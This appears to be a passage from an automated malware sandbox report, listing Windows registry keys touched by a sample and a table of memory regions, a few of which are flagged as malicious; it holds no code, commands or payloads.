HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
There are 332 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3729000
trusted library allocation
page read and write
malicious
8F1000
heap
page read and write
malicious
8D5000
heap
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
2A0000
trusted library allocation
page read and write
523E000
stack
page read and write
598000
heap
page read and write
2DD3000
heap
page read and write
580000
heap
page read and write
557000
heap
page read and write
2EC7000
heap
page read and write
5E8E000
stack
page read and write
960000
trusted library allocation
page read and write
2AEE000
stack
page read and write
2740000
trusted library allocation
page read and write
3A90000
heap
page read and write
6D3000
heap
page read and write
3BF000
heap
page read and write
29F000
stack
page read and write
257F000
stack
page read and write
3BBD000
stack
page read and write
451D000
stack
page read and write
3FE000
stack
page read and write
8B9000
heap
page read and write
4E2E000
stack
page read and write
4A8000
heap
page read and write
361E000
stack
page read and write
10016000
direct allocation
page execute and read and write
2D99000
heap
page read and write
990000
trusted library allocation
page read and write
2EC3000
heap
page read and write
2D54000
heap
page read and write
607000
heap
page read and write
8F0000
trusted library allocation
page read and write
570000
heap
page read and write
4010000
trusted library allocation
page read and write
D10000
heap
page read and write
CA0000
heap
page execute and read and write
2D65000
heap
page read and write
1F2D000
heap
page read and write
2A50000
heap
page read and write
490000
trusted library allocation
page read and write
4D9D000
stack
page read and write
218F000
stack
page read and write
1E4000
trusted library allocation
page read and write
2340000
heap
page read and write
5F4000
heap
page read and write
224F000
stack
page read and write
27FD000
trusted library allocation
page read and write
58E000
heap
page read and write
4556000
heap
page execute and read and write
600000
heap
page read and write
4ADE000
stack
page read and write
6A6000
heap
page read and write
278E000
trusted library allocation
page read and write
330000
trusted library allocation
page read and write
3E60000
heap
page read and write
97D000
stack
page read and write
10000
heap
page read and write
2EA5000
heap
page read and write
1E3000
trusted library allocation
page execute and read and write
1E0000
trusted library allocation
page read and write
380000
trusted library allocation
page read and write
2DA6000
heap
page read and write
663000
heap
page read and write
89000
stack
page read and write
3FA0000
trusted library allocation
page read and write
400000
system
page execute and read and write
3D0000
trusted library allocation
page execute and read and write
44CE000
stack
page read and write
27F9000
trusted library allocation
page read and write
950000
heap
page read and write
4B6E000
stack
page read and write
88000
stack
page read and write
1E3000
trusted library allocation
page execute and read and write
3B0000
heap
page read and write
240000
heap
page read and write
1E6000
heap
page read and write
620E000
stack
page read and write
294F000
stack
page read and write
28FE000
stack
page read and write
2D4E000
heap
page read and write
10000
heap
page read and write
47C000
stack
page read and write
4010000
trusted library allocation
page read and write
5FBD000
stack
page read and write
2E0000
trusted library allocation
page execute and read and write
8CA000
heap
page read and write
4A0000
heap
page read and write
220E000
stack
page read and write
4BDB000
stack
page read and write
277D000
trusted library allocation
page read and write
50EE000
stack
page read and write
420000
trusted library allocation
page execute and read and write
10000
heap
page read and write
95B000
heap
page read and write
70E000
stack
page read and write
2DCF000
heap
page read and write
8A0000
heap
page read and write
52A0000
heap
page read and write
276000
stack
page read and write
4AA000
heap
page read and write
2E91000
heap
page read and write
957000
heap
page read and write
4010000
trusted library allocation
page read and write
2F6E000
stack
page read and write
198000
heap
page read and write
25E000
stack
page read and write
470000
heap
page read and write
247000
heap
page read and write
4616000
heap
page execute and read and write
2608000
heap
page read and write
6A4000
heap
page read and write
180000
trusted library allocation
page read and write
6330000
trusted library section
page read and write
2601000
heap
page read and write
3B90000
heap
page read and write
1C0000
heap
page read and write
2D51000
heap
page read and write
18A000
stack
page read and write
1ED000
trusted library allocation
page execute and read and write
451D000
stack
page read and write
2D7D000
heap
page read and write
4A5F000
stack
page read and write
2ECC000
heap
page read and write
5FD000
heap
page read and write
27B000
stack
page read and write
3E0000
trusted library allocation
page read and write
495000
heap
page read and write
5D9E000
stack
page read and write
2D4E000
stack
page read and write
D9F000
stack
page read and write
390000
trusted library allocation
page execute and read and write
480000
trusted library allocation
page read and write
1D7000
stack
page read and write
1FA000
trusted library allocation
page read and write
10000
heap
page read and write
594000
heap
page read and write
2BCE000
stack
page read and write
227F000
stack
page read and write
49F000
heap
page read and write
607000
heap
page read and write
60E000
heap
page read and write
560000
heap
page read and write
25CE000
stack
page read and write
4C3000
heap
page read and write
1E4000
trusted library allocation
page read and write
2DAE000
heap
page read and write
2C0A000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
3F8000
heap
page read and write
810000
trusted library allocation
page read and write
45D000
system
page execute and read and write
2E9E000
heap
page read and write
5254000
heap
page read and write
2E9B000
heap
page read and write
8B7000
heap
page read and write
6A7000
heap
page read and write
2819000
trusted library allocation
page read and write
295E000
stack
page read and write
610000
heap
page read and write
9E0000
trusted library allocation
page read and write
535E000
stack
page read and write
2D62000
heap
page read and write
4010000
trusted library allocation
page read and write
8C0000
trusted library allocation
page read and write
923000
heap
page read and write
21E2000
heap
page read and write
4010000
trusted library allocation
page read and write
140000
heap
page read and write
2D61000
heap
page read and write
20FF000
stack
page read and write
5D0000
heap
page read and write
92B000
heap
page read and write
32F0000
heap
page read and write
820000
trusted library allocation
page read and write
9F0000
heap
page read and write
3FF000
heap
page read and write
210000
trusted library allocation
page read and write
22BF000
stack
page read and write
1F10000
heap
page read and write
CE0000
trusted library allocation
page read and write
9AF000
stack
page read and write
2B1000
heap
page read and write
3F0000
heap
page read and write
41F000
system
page execute and read and write
2DBF000
heap
page read and write
3ED000
stack
page read and write
3A6D000
stack
page read and write
27FB000
trusted library allocation
page read and write
26F000
heap
page read and write
2ECE000
stack
page read and write
600000
heap
page read and write
4010000
trusted library allocation
page read and write
3C0000
trusted library allocation
page read and write
386000
heap
page read and write
45C000
system
page execute and read and write
6A6000
heap
page read and write
34E000
stack
page read and write
6080000
heap
page read and write
281D000
trusted library allocation
page read and write
481000
heap
page read and write
202E000
stack
page read and write
26AA000
trusted library allocation
page read and write
463A000
stack
page read and write
4010000
trusted library allocation
page read and write
2619000
trusted library allocation
page read and write
3B9000
trusted library allocation
page read and write
2A4F000
stack
page read and write
69F000
heap
page read and write
25B4000
trusted library allocation
page read and write
21AE000
stack
page read and write
5D7000
heap
page read and write
2D82000
heap
page read and write
270000
trusted library allocation
page read and write
BD0000
trusted library allocation
page read and write
499E000
stack
page read and write | page guard
2762000
trusted library allocation
page read and write
4CE000
stack
page read and write
2280000
trusted library allocation
page read and write
2D8D000
heap
page read and write
292000
stack
page read and write
470000
heap
page read and write
69F000
heap
page read and write
2DCF000
heap
page read and write
69F000
heap
page read and write
4B1E000
stack
page read and write
95F000
heap
page read and write
6A6000
heap
page read and write
8D0000
heap
page read and write
3FC000
heap
page read and write
459000
system
page execute and read and write
BE0000
trusted library allocation
page read and write
4550000
heap
page execute and read and write
CD0000
trusted library allocation
page read and write
8AF000
stack
page read and write
4010000
trusted library allocation
page read and write
2ECF000
heap
page read and write
980000
trusted library allocation
page read and write
4EEE000
stack
page read and write
897000
heap
page read and write
37E000
stack
page read and write
233C000
stack
page read and write
292F000
stack
page read and write
6D0000
heap
page read and write
52A4000
heap
page read and write
8E0000
heap
page execute and read and write
803000
heap
page read and write
2C0000
heap
page read and write
2A5B000
heap
page read and write
22E0000
heap
page read and write
502C000
heap
page read and write
2420000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
1ED0000
heap
page read and write
212000
trusted library allocation
page read and write
4010000
trusted library allocation
page read and write
66F000
heap
page read and write
3509000
trusted library allocation
page read and write
2EA6000
heap
page read and write
4BEE000
stack
page read and write
2A54000
heap
page read and write
265E000
stack
page read and write
2FC000
stack
page read and write
388F000
stack
page read and write
730000
trusted library allocation
page read and write
2DB3000
heap
page read and write
4FFE000
stack
page read and write
10000
heap
page read and write
477000
heap
page read and write
640000
heap
page read and write
64E000
heap
page read and write
357F000
heap
page read and write
3CBF000
stack
page read and write
3649000
trusted library allocation
page read and write
57D000
heap
page read and write
4129000
trusted library allocation
page read and write
74A000
heap
page read and write
4FB0000
heap
page read and write
18C000
stack
page read and write
672000
heap
page read and write
2AE000
heap
page read and write
512E000
stack
page read and write
242E000
trusted library allocation
page read and write
C6C000
stack
page read and write
1D0000
heap
page read and write
2844000
trusted library allocation
page read and write
22AE000
stack
page read and write
95C000
heap
page read and write
5250000
heap
page read and write
62F000
heap
page read and write
2050000
heap
page read and write
3B6000
heap
page read and write
AA0000
trusted library allocation
page read and write
4F7E000
stack
page read and write
586000
heap
page read and write
2344000
heap
page read and write
7A0000
heap
page read and write
356F000
heap
page read and write
8B5000
heap
page read and write
2D4D000
heap
page read and write
27F7000
trusted library allocation
page read and write
2340000
heap
page read and write
2D8E000
unkown
page read and write
65D000
heap
page read and write
2EC7000
heap
page read and write
590000
heap
page read and write
D8E000
stack
page read and write
4B8E000
stack
page read and write
FC000
stack
page read and write
E7000
stack
page read and write
551000
heap
page read and write
4C5000
heap
page read and write
286000
heap
page read and write
59B000
heap
page read and write
624000
heap
page read and write
275B000
trusted library allocation
page read and write
3B0000
trusted library allocation
page read and write
B10000
trusted library allocation
page read and write
4C3E000
stack
page read and write
52C2000
heap
page read and write
279E000
stack
page read and write
4D2D000
heap
page read and write
456000
system
page execute and read and write
3A0000
trusted library allocation
page read and write
4FE1000
heap
page read and write
2282000
trusted library allocation
page read and write
22FC000
stack
page read and write
2700000
trusted library allocation
page read and write
2F31000
heap
page read and write
3F9C000
stack
page read and write
4D00000
heap
page read and write
2A7000
trusted library allocation
page read and write
A0000
heap
page read and write
4010000
trusted library allocation
page read and write
3FA0000
trusted library allocation
page read and write
2E30000
heap
page read and write
676000
heap
page read and write
4610000
heap
page execute and read and write
2DBA000
heap
page read and write
2380000
heap
page read and write
2C7000
heap
page read and write
30E000
stack
page read and write
8EC000
heap
page read and write
4D10000
heap
page read and write
144000
heap
page read and write
274A000
trusted library allocation
page read and write
3FE000
stack
page read and write
CE0000
trusted library allocation
page read and write
4010000
trusted library allocation
page read and write
C92000
trusted library allocation
page read and write
1E90000
heap
page read and write
468E000
stack
page read and write
2759000
heap
page read and write
3AC0000
heap
page read and write
2100000
heap
page read and write
4E70000
heap
page read and write
1F0000
trusted library allocation
page read and write
2813000
trusted library allocation
page read and write
